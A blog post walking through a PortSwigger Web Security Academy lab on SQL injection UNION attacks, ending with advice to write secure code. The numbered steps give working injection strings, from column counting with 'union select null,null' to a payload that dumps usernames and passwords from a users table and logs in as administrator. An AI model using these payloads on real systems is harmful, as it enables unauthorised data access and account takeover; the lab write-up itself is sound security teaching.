SQL INJECTION UNION ATTACK

This blog will provide an exploration of SQL injection, with a specific focus on the SQL Injection UNION attack. The content will revolve around practical demonstrations utilizing the laboratory exercises available on https://portswigger.net/web-security/all-labs.

SQL Injection, commonly referred to as SQLi, represents a web security vulnerability enabling attackers to disrupt an application’s database queries. Exploiting this vulnerability grants unauthorized access to view data beyond their intended scope. Furthermore, malicious actors can manipulate or delete this data, resulting in enduring alterations to the application’s content or functionality.

SQL Injection Attack

SQLi vulnerability encompasses a variety of attacks and techniques, each applicable in distinct situations. Several common examples of SQLi include:

1. Retrieving Hidden Data: This involves modifying a SQL query to extract additional results that are not typically visible.

2. Subverting Application Logic: Attackers manipulate a query to disrupt the normal flow of an application’s logic.

3. UNION Attacks: Exploiting the UNION SQL operator to combine and retrieve data from different tables in the database.

4. Blind SQLi: The results of a query, controlled by the attacker, are not directly disclosed in the application’s responses.

Let’s now delve into the specifics of SQL Injection UNION attacks:

In the event of a SQL injection vulnerability in an application, where query results are incorporated into the application’s responses, exploiting the UNION keyword enables the extraction of data from different tables within the database. This exploit is commonly identified as a SQL injection UNION attack.

Learning Path:

Web Security Academy > SQL injection > UNION attacks > Lab

Lab: SQL injection UNION attack, retrieving data from other tables | Web Security Academy

Lab Description:
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.The database contains a different table called users, with columns called username and password.To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

STEPS:

Step 1:
Upon initially entering the lab, one will notice the presence of a web store featuring multiple categories. Additionally, the refine your search functionality allows users to narrow down the inquiries and explore specific product categories.

Step 2:

When refining the search to a specific category, such as Accessories, an observation in the URL bar reveals a parameter labeled “category=Accessories.” This parameter corresponds to the underlying SQL query, resembling something like SELECT * FROM products WHERE category ‘Accessories’ AND released = 1.

Step 3:

Attempting to change the parameter to Accessories’ category in the URL bar leads to an internal error. This issue arises because the interpretation becomes something like SELECT * FROM products WHERE category ‘Accessories’’ AND released = 1, causing a syntax error in the SQL query.

Step 4:

Now, let’s explore the UNION aspect by utilizing the null string to determine the number of columns present. To achieve this, we will append “Accessories’+union+select+null,null” to the URL. This input will be interpreted as follows: SELECT * FROM products WHERE category = ‘Accessories’ UNION SELECT null,null.

Step 5:
Having received a successful response, we can infer the presence of two columns. To discern the data type within a column, a test query “Accessories’+union+select+’test’,’test1' “ is employed. Confirming a successful response indicates that the column indeed contains string values.

Step 6:

Attempting to infiltrate the login credentials by injecting “Accessories’+union+select+username,password+from+users — ” into the URL results in an interpretation such as SELECT * FROM products WHERE category = ‘Accessories’ UNION SELECT username,password FROM users — ‘. This query successfully retrieves login credentials for users, including the administrator.

Step 7:

With the discovered credentials of the administrator, we can proceed to log in to the web page, thereby successfully completing the lab.

In a nutshell, we dived into SQL Injection stuff, focusing on the UNION attack. It’s like a sneaky way bad guys mess with a website’s database. We did a hands-on example to show how they can grab data and even snag admin logins. The takeaway? Keep your web defenses strong, write secure code, and regularly check for any shady business in your apps. Stay safe out there!